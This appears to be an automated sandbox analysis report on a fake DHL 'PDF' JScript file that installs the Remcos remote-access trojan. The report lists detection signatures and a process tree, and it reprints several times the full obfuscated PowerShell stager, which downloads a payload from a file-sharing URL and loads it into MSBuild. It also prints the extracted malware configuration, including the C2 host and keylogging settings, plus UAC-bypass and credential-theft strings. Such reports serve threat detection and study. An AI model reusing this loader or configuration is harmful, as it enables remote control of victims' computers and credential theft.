
Windows Analysis Report
DHL RPA GRBP Template.PDF.js

Overview

General Information

Sample name: DHL RPA GRBP Template.PDF.js
Analysis ID: 1619144
MD5: 27cb47b5e1ac316a34e346dc787782f6
SHA1: 70d3f484ab6ca95c0d03479894181a4fbb883583
SHA256: abc914c82dac8f803df0ae50a350c38cd7af60344f60936a6df01198efbb03f6
Tags: DHL, js, RemcosRAT, user-MAM

Detection

Remcos
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Installs a global keyboard hook
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Silenttrinity Stager Msbuild Activity
Sigma detected: Suspicious Parent Double Extension File Execution
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses an obfuscated file name to hide its real file extension (double extension)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 1492 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL RPA GRBP Template.PDF.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6968 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$UUcRpCLGmLLdZKLGLZCh = '#x#.mon/ssc/sr.marolka#s//:sp##h';$khuGfWKcLCfBKPjrGWTo = $UUcRpCLGmLLdZKLGLZCh -replace '#', 't';$BokSBmcmWWtzWevWaoqx = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$qkoqGLWpWlePGLTbGWKi = New-Object System.Net.WebClient;$UtrGGLzeWZaiUKLALckK = $qkoqGLWpWlePGLTbGWKi.DownloadData($BokSBmcmWWtzWevWaoqx);$KznfbhLAKWeixbiKOLmf = [System.Text.Encoding]::UTF8.GetString($UtrGGLzeWZaiUKLALckK);$pqGmGJhCUdHPTWoNGzoi = '<<BASE64_START>>';$fkbtKicqWUKucKZfPsGZ = '<<BASE64_END>>';$IWkjipLrkKzmLLZTWnAZ = $KznfbhLAKWeixbiKOLmf.IndexOf($pqGmGJhCUdHPTWoNGzoi);$kLqhkkloLQnlpAAWtUfc = $KznfbhLAKWeixbiKOLmf.IndexOf($fkbtKicqWUKucKZfPsGZ);$IWkjipLrkKzmLLZTWnAZ -ge 0 -and $kLqhkkloLQnlpAAWtUfc -gt $IWkjipLrkKzmLLZTWnAZ;$IWkjipLrkKzmLLZTWnAZ += $pqGmGJhCUdHPTWoNGzoi.Length;$WZWCixKGqLjWLKAblnWb = $kLqhkkloLQnlpAAWtUfc - $IWkjipLrkKzmLLZTWnAZ;$BqfbkPmiGKPWmKNxlCCR = $KznfbhLAKWeixbiKOLmf.Substring($IWkjipLrkKzmLLZTWnAZ, $WZWCixKGqLjWLKAblnWb);$izpdcONcauWPfczuWZNS = [System.Convert]::FromBase64String($BqfbkPmiGKPWmKNxlCCR);$GtULNOKhlcioutbuALkp = [System.Reflection.Assembly]::Load($izpdcONcauWPfczuWZNS);$aPozWGuWPfkczdpKSqdK = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($khuGfWKcLCfBKPjrGWTo,'','','','MSBuild','','','','','C:\ProgramData\','marly','js','1','1','pessaries'))" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1772 cmdline: "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\marly.js" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MSBuild.exe (PID: 5600 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • wscript.exe (PID: 5656 cmdline: wscript.exe C:\ProgramData\marly.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["meme.linkpc.net:3174:1"], "Assigned name": "nm", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "sos", "Hide file": "Disable", "Mutex": "gig-G7MMFK", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "vlc", "Keylog folder": "ios", "Keylog file max size": "100"}
Source | Rule | Description | Author | Strings
00000008.00000002.3527390495.0000000001208000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000008.00000002.3525134792.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000008.00000002.3525134792.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown
      • 0x691e0:$a1: Remcos restarted by watchdog!
      • 0x69738:$a3: %02i:%02i:%02i:%03i
      • 0x69abd:$a4: * Remcos v
00000008.00000002.3525134792.0000000000400000.00000040.00000400.00020000.00000000.sdmp | REMCOS_RAT_variants | unknown | unknown
      • 0x641e4:$str_a1: C:\Windows\System32\cmd.exe
      • 0x64160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      • 0x64160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      • 0x63610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
      • 0x63e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
      • 0x6320c:$str_b2: Executing file:
      • 0x64328:$str_b3: GetDirectListeningPort
      • 0x63c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
      • 0x63e30:$str_b7: \update.vbs
      • 0x63234:$str_b9: Downloaded file:
      • 0x63220:$str_b10: Downloading file:
      • 0x632c4:$str_b12: Failed to upload file:
      • 0x642f0:$str_b13: StartForward
      • 0x64310:$str_b14: StopForward
      • 0x63dd8:$str_b15: fso.DeleteFile "
      • 0x63d6c:$str_b16: On Error Resume Next
      • 0x63e08:$str_b17: fso.DeleteFolder "
      • 0x632b4:$str_b18: Uploaded file:
      • 0x63274:$str_b19: Unable to delete:
      • 0x63da0:$str_b20: while fso.FileExists("
      • 0x63749:$str_c0: [Firefox StoredLogins not found]
00000008.00000002.3525134792.0000000000400000.00000040.00000400.00020000.00000000.sdmp | INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer | detects Windows executables potentially bypassing UAC using eventvwr.exe | ditekSHen
      • 0x63100:$s1: \Classes\mscfile\shell\open\command
      • 0x63160:$s1: \Classes\mscfile\shell\open\command
      • 0x63148:$s2: eventvwr.exe
Source | Rule | Description | Author | Strings
2.2.powershell.exe.16f1056dd48.5.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
2.2.powershell.exe.16f1056dd48.5.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
        • 0x661e0:$a1: Remcos restarted by watchdog!
        • 0x66738:$a3: %02i:%02i:%02i:%03i
        • 0x66abd:$a4: * Remcos v
2.2.powershell.exe.16f1056dd48.5.unpack | REMCOS_RAT_variants | unknown | unknown
        • 0x611e4:$str_a1: C:\Windows\System32\cmd.exe
        • 0x61160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x61160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x60610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
        • 0x60e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
        • 0x6020c:$str_b2: Executing file:
        • 0x61328:$str_b3: GetDirectListeningPort
        • 0x60c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
        • 0x60e30:$str_b7: \update.vbs
        • 0x60234:$str_b9: Downloaded file:
        • 0x60220:$str_b10: Downloading file:
        • 0x602c4:$str_b12: Failed to upload file:
        • 0x612f0:$str_b13: StartForward
        • 0x61310:$str_b14: StopForward
        • 0x60dd8:$str_b15: fso.DeleteFile "
        • 0x60d6c:$str_b16: On Error Resume Next
        • 0x60e08:$str_b17: fso.DeleteFolder "
        • 0x602b4:$str_b18: Uploaded file:
        • 0x60274:$str_b19: Unable to delete:
        • 0x60da0:$str_b20: while fso.FileExists("
        • 0x60749:$str_c0: [Firefox StoredLogins not found]
2.2.powershell.exe.16f1056dd48.5.unpack | INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer | detects Windows executables potentially bypassing UAC using eventvwr.exe | ditekSHen
        • 0x60100:$s1: \Classes\mscfile\shell\open\command
        • 0x60160:$s1: \Classes\mscfile\shell\open\command
        • 0x60148:$s2: eventvwr.exe
8.2.MSBuild.exe.400000.0.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security

          System Summary

          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$UUcRpCLGmLLdZKLGLZCh = '#x#.mon/ssc/sr.marolka#s//:sp##h';$khuGfWKcLCfBKPjrGWTo = $UUcRpCLGmLLdZKLGLZCh -replace '#', 't';$BokSBmcmWWtzWevWaoqx = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$qkoqGLWpWlePGLTbGWKi = New-Object System.Net.WebClient;$UtrGGLzeWZaiUKLALckK = $qkoqGLWpWlePGLTbGWKi.DownloadData($BokSBmcmWWtzWevWaoqx);$KznfbhLAKWeixbiKOLmf = [System.Text.Encoding]::UTF8.GetString($UtrGGLzeWZaiUKLALckK);$pqGmGJhCUdHPTWoNGzoi = '<<BASE64_START>>';$fkbtKicqWUKucKZfPsGZ = '<<BASE64_END>>';$IWkjipLrkKzmLLZTWnAZ = $KznfbhLAKWeixbiKOLmf.IndexOf($pqGmGJhCUdHPTWoNGzoi);$kLqhkkloLQnlpAAWtUfc = $KznfbhLAKWeixbiKOLmf.IndexOf($fkbtKicqWUKucKZfPsGZ);$IWkjipLrkKzmLLZTWnAZ -ge 0 -and $kLqhkkloLQnlpAAWtUfc -gt $IWkjipLrkKzmLLZTWnAZ;$IWkjipLrkKzmLLZTWnAZ += $pqGmGJhCUdHPTWoNGzoi.Length;$WZWCixKGqLjWLKAblnWb = $kLqhkkloLQnlpAAWtUfc - $IWkjipLrkKzmLLZTWnAZ;$BqfbkPmiGKPWmKNxlCCR = $KznfbhLAKWeixbiKOLmf.Substring($IWkjipLrkKzmLLZTWnAZ, $WZWCixKGqLjWLKAblnWb);$izpdcONcauWPfczuWZNS = [System.Convert]::FromBase64String($BqfbkPmiGKPWmKNxlCCR);$GtULNOKhlcioutbuALkp = [System.Reflection.Assembly]::Load($izpdcONcauWPfczuWZNS);$aPozWGuWPfkczdpKSqdK = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($khuGfWKcLCfBKPjrGWTo,'','','','MSBuild','','','','','C:\ProgramData\','marly','js','1','1','pessaries'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$UUcRpCLGmLLdZKLGLZCh = '#x#.mon/ssc/sr.marolka#s//:sp##h';$khuGfWKcLCfBKPjrGWTo = $UUcRpCLGmLLdZKLGLZCh -replace '#', 't';$BokSBmcmWWtzWevWaoqx = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$qkoqGLWpWlePGLTbGWKi = New-Object 
System.Net.WebClient;$UtrGGLzeWZaiUKLALckK = $qkoqGLWpWlePGLTbGWKi.DownloadData($BokSBmcmWWtzWevWaoqx);$KznfbhLAKWeixbiKOLmf = [System.Text.Encoding]::UTF8.GetString($UtrGGLzeWZaiUKLALckK);$pqGmGJhCUdHPTWoNGzoi = '<<BASE64_START>>';$fkbtKicqWUKucKZfPsGZ = '<<BASE64_END>>';$IWkjipLrkKzmLLZTWnAZ = $KznfbhLAKWeixbiKOLmf.IndexOf($pqGmGJhCUdHPTWoNGzoi);$kLqhkkloLQnlpAAWtUfc = $KznfbhLAKWeixbiKOLmf.IndexOf($fkbtKicqWUKucKZfPsGZ);$IWkjipLrkKzmLLZTWnAZ -ge 0 -and $kLqhkkloLQnlpAAWtUfc -gt $IWkjipLrkKzmLLZTWnAZ;$IWkjipLrkKzmLLZTWnAZ += $pqGmGJhCUdHPTWoNGzoi.Length;$WZWCixKGqLjWLKAblnWb = $kLqhkkloLQnlpAAWtUfc - $IWkjipLrkKzmLLZTWnAZ;$BqfbkPmiGKPWmKNxlCCR = $KznfbhLAKWeixbiKOLmf.Substring($IWkjipLrkKzmLLZTWnAZ, $WZWCixKGqLjWLKAblnWb);$izpdcONcauWPfczuWZNS = [System.Convert]::FromBase64String($BqfbkPmiGKPWmKNxlCCR);$GtULNOKhlcioutbuALkp = [System.Reflection.Assembly]::Load($izpdcONcauWPfczuWZNS);$aPozWGuWPfkczdpKSqdK = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($khuGfWKcLCfBKPjrGWTo,'','','','MSBuild','','','','','C:\ProgramData\','marly','js','1','1','pessa
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$UUcRpCLGmLLdZKLGLZCh = '#x#.mon/ssc/sr.marolka#s//:sp##h';$khuGfWKcLCfBKPjrGWTo = $UUcRpCLGmLLdZKLGLZCh -replace '#', 't';$BokSBmcmWWtzWevWaoqx = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$qkoqGLWpWlePGLTbGWKi = New-Object System.Net.WebClient;$UtrGGLzeWZaiUKLALckK = $qkoqGLWpWlePGLTbGWKi.DownloadData($BokSBmcmWWtzWevWaoqx);$KznfbhLAKWeixbiKOLmf = [System.Text.Encoding]::UTF8.GetString($UtrGGLzeWZaiUKLALckK);$pqGmGJhCUdHPTWoNGzoi = '<<BASE64_START>>';$fkbtKicqWUKucKZfPsGZ = '<<BASE64_END>>';$IWkjipLrkKzmLLZTWnAZ = $KznfbhLAKWeixbiKOLmf.IndexOf($pqGmGJhCUdHPTWoNGzoi);$kLqhkkloLQnlpAAWtUfc = $KznfbhLAKWeixbiKOLmf.IndexOf($fkbtKicqWUKucKZfPsGZ);$IWkjipLrkKzmLLZTWnAZ -ge 0 -and $kLqhkkloLQnlpAAWtUfc -gt $IWkjipLrkKzmLLZTWnAZ;$IWkjipLrkKzmLLZTWnAZ += $pqGmGJhCUdHPTWoNGzoi.Length;$WZWCixKGqLjWLKAblnWb = $kLqhkkloLQnlpAAWtUfc - $IWkjipLrkKzmLLZTWnAZ;$BqfbkPmiGKPWmKNxlCCR = $KznfbhLAKWeixbiKOLmf.Substring($IWkjipLrkKzmLLZTWnAZ, $WZWCixKGqLjWLKAblnWb);$izpdcONcauWPfczuWZNS = [System.Convert]::FromBase64String($BqfbkPmiGKPWmKNxlCCR);$GtULNOKhlcioutbuALkp = [System.Reflection.Assembly]::Load($izpdcONcauWPfczuWZNS);$aPozWGuWPfkczdpKSqdK = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($khuGfWKcLCfBKPjrGWTo,'','','','MSBuild','','','','','C:\ProgramData\','marly','js','1','1','pessaries'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$UUcRpCLGmLLdZKLGLZCh = '#x#.mon/ssc/sr.marolka#s//:sp##h';$khuGfWKcLCfBKPjrGWTo = $UUcRpCLGmLLdZKLGLZCh -replace '#', 't';$BokSBmcmWWtzWevWaoqx = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$qkoqGLWpWlePGLTbGWKi = New-Object 
System.Net.WebClient;$UtrGGLzeWZaiUKLALckK = $qkoqGLWpWlePGLTbGWKi.DownloadData($BokSBmcmWWtzWevWaoqx);$KznfbhLAKWeixbiKOLmf = [System.Text.Encoding]::UTF8.GetString($UtrGGLzeWZaiUKLALckK);$pqGmGJhCUdHPTWoNGzoi = '<<BASE64_START>>';$fkbtKicqWUKucKZfPsGZ = '<<BASE64_END>>';$IWkjipLrkKzmLLZTWnAZ = $KznfbhLAKWeixbiKOLmf.IndexOf($pqGmGJhCUdHPTWoNGzoi);$kLqhkkloLQnlpAAWtUfc = $KznfbhLAKWeixbiKOLmf.IndexOf($fkbtKicqWUKucKZfPsGZ);$IWkjipLrkKzmLLZTWnAZ -ge 0 -and $kLqhkkloLQnlpAAWtUfc -gt $IWkjipLrkKzmLLZTWnAZ;$IWkjipLrkKzmLLZTWnAZ += $pqGmGJhCUdHPTWoNGzoi.Length;$WZWCixKGqLjWLKAblnWb = $kLqhkkloLQnlpAAWtUfc - $IWkjipLrkKzmLLZTWnAZ;$BqfbkPmiGKPWmKNxlCCR = $KznfbhLAKWeixbiKOLmf.Substring($IWkjipLrkKzmLLZTWnAZ, $WZWCixKGqLjWLKAblnWb);$izpdcONcauWPfczuWZNS = [System.Convert]::FromBase64String($BqfbkPmiGKPWmKNxlCCR);$GtULNOKhlcioutbuALkp = [System.Reflection.Assembly]::Load($izpdcONcauWPfczuWZNS);$aPozWGuWPfkczdpKSqdK = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($khuGfWKcLCfBKPjrGWTo,'','','','MSBuild','','','','','C:\ProgramData\','marly','js','1','1','pessa
Source: Network Connection; Author: frack113, Florian Roth; Data: DestinationIp: 23.186.113.60, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 1492, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49762
Source: Network Connection; Author: Kiran kumar s, oscd.community; Data: DestinationIp: 178.237.33.50, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 5600, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49861
          Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$UUcRpCLGmLLdZKLGLZCh = '#x#.mon/ssc/sr.marolka#s//:sp##h';$khuGfWKcLCfBKPjrGWTo = $UUcRpCLGmLLdZKLGLZCh -replace '#', 't';$BokSBmcmWWtzWevWaoqx = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$qkoqGLWpWlePGLTbGWKi = New-Object System.Net.WebClient;$UtrGGLzeWZaiUKLALckK = $qkoqGLWpWlePGLTbGWKi.DownloadData($BokSBmcmWWtzWevWaoqx);$KznfbhLAKWeixbiKOLmf = [System.Text.Encoding]::UTF8.GetString($UtrGGLzeWZaiUKLALckK);$pqGmGJhCUdHPTWoNGzoi = '<<BASE64_START>>';$fkbtKicqWUKucKZfPsGZ = '<<BASE64_END>>';$IWkjipLrkKzmLLZTWnAZ = $KznfbhLAKWeixbiKOLmf.IndexOf($pqGmGJhCUdHPTWoNGzoi);$kLqhkkloLQnlpAAWtUfc = $KznfbhLAKWeixbiKOLmf.IndexOf($fkbtKicqWUKucKZfPsGZ);$IWkjipLrkKzmLLZTWnAZ -ge 0 -and $kLqhkkloLQnlpAAWtUfc -gt $IWkjipLrkKzmLLZTWnAZ;$IWkjipLrkKzmLLZTWnAZ += $pqGmGJhCUdHPTWoNGzoi.Length;$WZWCixKGqLjWLKAblnWb = $kLqhkkloLQnlpAAWtUfc - $IWkjipLrkKzmLLZTWnAZ;$BqfbkPmiGKPWmKNxlCCR = $KznfbhLAKWeixbiKOLmf.Substring($IWkjipLrkKzmLLZTWnAZ, $WZWCixKGqLjWLKAblnWb);$izpdcONcauWPfczuWZNS = [System.Convert]::FromBase64String($BqfbkPmiGKPWmKNxlCCR);$GtULNOKhlcioutbuALkp = [System.Reflection.Assembly]::Load($izpdcONcauWPfczuWZNS);$aPozWGuWPfkczdpKSqdK = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($khuGfWKcLCfBKPjrGWTo,'','','','MSBuild','','','','','C:\ProgramData\','marly','js','1','1','pessaries'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$UUcRpCLGmLLdZKLGLZCh = '#x#.mon/ssc/sr.marolka#s//:sp##h';$khuGfWKcLCfBKPjrGWTo = $UUcRpCLGmLLdZKLGLZCh -replace '#', 't';$BokSBmcmWWtzWevWaoqx = 
'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$qkoqGLWpWlePGLTbGWKi = New-Object System.Net.WebClient;$UtrGGLzeWZaiUKLALckK = $qkoqGLWpWlePGLTbGWKi.DownloadData($BokSBmcmWWtzWevWaoqx);$KznfbhLAKWeixbiKOLmf = [System.Text.Encoding]::UTF8.GetString($UtrGGLzeWZaiUKLALckK);$pqGmGJhCUdHPTWoNGzoi = '<<BASE64_START>>';$fkbtKicqWUKucKZfPsGZ = '<<BASE64_END>>';$IWkjipLrkKzmLLZTWnAZ = $KznfbhLAKWeixbiKOLmf.IndexOf($pqGmGJhCUdHPTWoNGzoi);$kLqhkkloLQnlpAAWtUfc = $KznfbhLAKWeixbiKOLmf.IndexOf($fkbtKicqWUKucKZfPsGZ);$IWkjipLrkKzmLLZTWnAZ -ge 0 -and $kLqhkkloLQnlpAAWtUfc -gt $IWkjipLrkKzmLLZTWnAZ;$IWkjipLrkKzmLLZTWnAZ += $pqGmGJhCUdHPTWoNGzoi.Length;$WZWCixKGqLjWLKAblnWb = $kLqhkkloLQnlpAAWtUfc - $IWkjipLrkKzmLLZTWnAZ;$BqfbkPmiGKPWmKNxlCCR = $KznfbhLAKWeixbiKOLmf.Substring($IWkjipLrkKzmLLZTWnAZ, $WZWCixKGqLjWLKAblnWb);$izpdcONcauWPfczuWZNS = [System.Convert]::FromBase64String($BqfbkPmiGKPWmKNxlCCR);$GtULNOKhlcioutbuALkp = [System.Reflection.Assembly]::Load($izpdcONcauWPfczuWZNS);$aPozWGuWPfkczdpKSqdK = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($khuGfWKcLCfBKPjrGWTo,'','','','MSBuild','','','','','C:\ProgramData\','marly','js','1','1','pessa
Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL RPA GRBP Template.PDF.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL RPA GRBP Template.PDF.js", CommandLine|base64offset|contains: D, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL RPA GRBP Template.PDF.js", ProcessId: 1492, ProcessName: wscript.exe
Source: Network Connection; Author: frack113; Data: DestinationIp: 23.186.113.60, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 1492, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49762
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\marly.js", CommandLine: "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\marly.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$UUcRpCLGmLLdZKLGLZCh = '#x#.mon/ssc/sr.marolka#s//:sp##h';$khuGfWKcLCfBKPjrGWTo = $UUcRpCLGmLLdZKLGLZCh -replace '#', 't';$BokSBmcmWWtzWevWaoqx = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$qkoqGLWpWlePGLTbGWKi = New-Object System.Net.WebClient;$UtrGGLzeWZaiUKLALckK = $qkoqGLWpWlePGLTbGWKi.DownloadData($BokSBmcmWWtzWevWaoqx);$KznfbhLAKWeixbiKOLmf = [System.Text.Encoding]::UTF8.GetString($UtrGGLzeWZaiUKLALckK);$pqGmGJhCUdHPTWoNGzoi = '<<BASE64_START>>';$fkbtKicqWUKucKZfPsGZ = '<<BASE64_END>>';$IWkjipLrkKzmLLZTWnAZ = $KznfbhLAKWeixbiKOLmf.IndexOf($pqGmGJhCUdHPTWoNGzoi);$kLqhkkloLQnlpAAWtUfc = 